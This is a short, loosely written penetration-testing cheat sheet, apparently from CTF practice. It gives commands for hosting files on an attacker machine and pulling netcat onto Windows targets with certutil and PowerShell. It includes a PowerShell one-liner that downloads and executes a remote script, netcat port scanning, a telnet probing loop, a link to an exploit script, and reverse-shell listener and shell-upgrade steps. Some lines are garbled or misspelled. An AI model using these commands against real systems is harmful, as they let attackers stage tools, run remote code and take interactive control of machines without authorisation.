python -m SimpleHTTPServer 80 
or 
python3 -m http.server
or
simpleHTTPServer //tomnomnom go language

Windows:
1. certutil (equivalent to linux wget) —
certutil.exe -f -split -urlcache http://<ip>/nc.exe C:\Windows\Temp\nc.exe
certutil -urlcache -f http://10.10.50.169:80/ gatekeper

2. Powershell —
powershell.exe (New-Object System.Net.WebClient).DownloadFile(“http://<ip>/nc.exe”, “C:\Windows\Temp\nc.exe”)

3. PS equivalent of curl http://ip/script.sh | bash — powershell.exe IEX(New-Object System.Net.WebClient).DownloadString(‘http://ip/script.ps1')."

blog: https://blog.ropnop.com/transferring-files-from-kali-to-windows/


nc 10.10.202.174 1-100 -v [same thing] for i in {50..100}; do (sleep 1; echo "get /") | telnet hell $i | grep 550 >> x ; done


it use ctf & bouty & similar as netcat : https://github.com/musyoka101/Injection-TryHackMe-exploit-script
command : python3 inkjet.py ip
```
--------natcat persmiion----------
1. nc -nlvp 1234
2. script
3. nc -nlvp 1234
4. /usr/bin/script -qc /bin/bash /dev/null
---------
stty raw -echo
nc -nlvp 1234
--------------
nc -nlvp 1234
id
pwd
--------------
script -q /dev/null
export TERM=xterm
